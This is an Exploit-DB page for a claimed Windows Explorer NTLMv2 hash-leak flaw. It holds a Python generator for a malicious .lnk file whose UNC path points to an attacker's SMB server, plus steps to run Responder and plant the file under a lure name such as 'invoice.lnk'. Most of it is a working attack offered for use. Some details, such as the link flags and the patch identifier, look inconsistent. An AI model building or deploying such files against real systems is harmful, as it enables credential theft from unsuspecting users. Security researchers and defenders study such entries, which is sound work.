This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Microsoft - NTLMv2 Hash Capture EDB-ID: 52601 CVE: 2026-32202 EDB Verified: Author: NU11SECUR1TY Type: REMOTE Exploit: / Platform: WINDOWS Date: 2026-05-29 Vulnerable App: # Titles: Microsoft - NTLMv2 Hash Capture # Author: nu11secur1ty # Date: 2026-05-27 # Vendor: Microsoft # Software: Windows Shell (File Explorer) # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202 ## Description: A spoofing vulnerability in Windows Shell (File Explorer) allows an attacker to capture NTLMv2 hashes without user interaction. By crafting a malicious .lnk (shortcut) file with a UNC path pointing to an attacker-controlled SMB server, the target's Windows system automatically sends an NTLMv2 authentication request when the folder containing the .lnk file is opened. No click on the shortcut is required – simply viewing the folder triggers the vulnerability. **CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak **Attack Vector**: Network (SMB) **Privileges Required**: None (user only needs to open a folder) **User Interaction**: None (zero-click) **Affected Versions**: - Windows 11 23H2, 24H2, 25H2, 26H1 - Windows 10 21H2-22H2 - Windows Server 2019/2022/2025 **Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214) STATUS: MEDIUM - HIGH/ Vulnerability [+]Payload: ```POST SMB/CIFS NTLMv2 Authentication Request UNC Path: \\ATTACKER_IP\share\payload.dll Protocol: SMB2 (port 445) Hash Type: NetNTLMv2 ``` [+]Exploit: ``` #!/usr/bin/env python3 """ CVE-2026-32202 LNK Exploit Generator Author: nu11secur1ty Generates LNK file that leaks NTLM hash to Responder/Impacket """ import struct import sys import os def create_malicious_lnk(attacker_ip, output_file="exploit.lnk", share_name="share"): """ Creates LNK file with UNC path to attacker machine """ unc_path = f"\\\\{attacker_ip}\\{share_name}\\test" unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00' # LNK structure (standard + vulnerable component) lnk = bytearray() # ===== HEADER (76 bytes) ===== lnk.extend(struct.pack('<I', 0x0000004C)) # HeaderSize # LinkCLSID: {00021401-0000-0000-C000-000000000046} lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46') lnk.extend(struct.pack('<I', 0x000002A3)) # LinkFlags (HasName|HasWorkingDir|HasArguments|IsUnicode) lnk.extend(struct.pack('<I', 0x00000080)) # FileAttributes (NORMAL) lnk.extend(struct.pack('<Q', 0)) # CreationTime lnk.extend(struct.pack('<Q', 0)) # AccessTime lnk.extend(struct.pack('<Q', 0)) # WriteTime lnk.extend(struct.pack('<I', 0x00001000)) # FileSize lnk.extend(struct.pack('<I', 0x00000000)) # IconIndex lnk.extend(struct.pack('<I', 0x00000001)) # ShowCommand (SW_NORMAL) lnk.extend(struct.pack('<H', 0x0000)) # Hotkey lnk.extend(b'\x00\x00') # Reserved lnk.extend(b'\x00\x00\x00\x00') # Reserved2 lnk.extend(b'\x00\x00\x00\x00') # Reserved3 # ===== IDLIST (activates when folder is opened) ===== # Shell Folder IDITEM lnk.extend(b'\x14\x00') # ItemID size (20 bytes) lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') lnk.extend(b'\x00\x00') # Terminating ID # ===== STRING DATA (CRITICAL FOR EXPLOIT) ===== # NameString (UNC path - triggers NTLM hash leak) lnk.extend(struct.pack('<H', len(unc_utf16))) lnk.extend(unc_utf16) # ArgumentsString (empty) lnk.extend(b'\x00\x00') # WorkingDir (UNC path again) lnk.extend(struct.pack('<H', len(unc_utf16))) lnk.extend(unc_utf16) # ===== Console Properties (required for some Windows versions) ===== lnk.extend(b'\x50\x00\x14\x00') # dwWindowSize (80x20) lnk.extend(b'\x50\x00\xfa\x00') # dwBufferSize (80x250) lnk.extend(b'\x00\x00\x00\x00') # dwFontSize lnk.extend(b'\x00\x00\x00\x00') # dwFontFamily lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameLen lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameOffset lnk.extend(b'\x00\x00\x00\x00') # dwStyle # 64 bytes padding lnk.extend(b'\x00' * 64) # Save the file with open(output_file, 'wb') as f: f.write(lnk) return output_file, unc_path def main(): print(r""" ╔═══════════════════════════════════════════╗ ║ CVE-2026-32202 - LNK Generator ║ ║ Author: nu11secur1ty ║ ╚═══════════════════════════════════════════╝ """) if len(sys.argv) < 2: print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP> [output_file]") print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk") sys.exit(1) attacker_ip = sys.argv[1] output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk" lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file) print(f"[+] Exploit ready!") print(f"[+] File: {lnk_file}") print(f"[+] UNC path: {unc_path}") print() print("[*] Next steps:") print(f" 1. Start Responder: sudo responder -I eth0 -v") print(f" 2. Transfer {lnk_file} to Windows 11 Desktop") print(f" 3. Open Desktop in File Explorer (no click required)") print(f" 4. Watch Responder - NTLM hash will appear") print() with open("start_responder.sh", "w") as f: f.write("#!/bin/bash\n") f.write("echo \"[+] Starting Responder...\"\n") f.write("sudo responder -I eth0 -v\n") os.chmod("start_responder.sh", 0o755) print("[+] Helper script created: start_responder.sh") if __name__ == "__main__": main() ``` Demo: [href](https://www.patreon.com/posts/cve-2026-32202-159362448) Code: [code]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202) Time spent: 02:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/ On Wed, May 27, 2026 at 2:06 PM Offsec Exploits < submit@offensive-security.com> wrote: > Hello, > > Thank you for your submission. > We will be checking it shortly. > > Regards > - Exploit-DB Team > -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.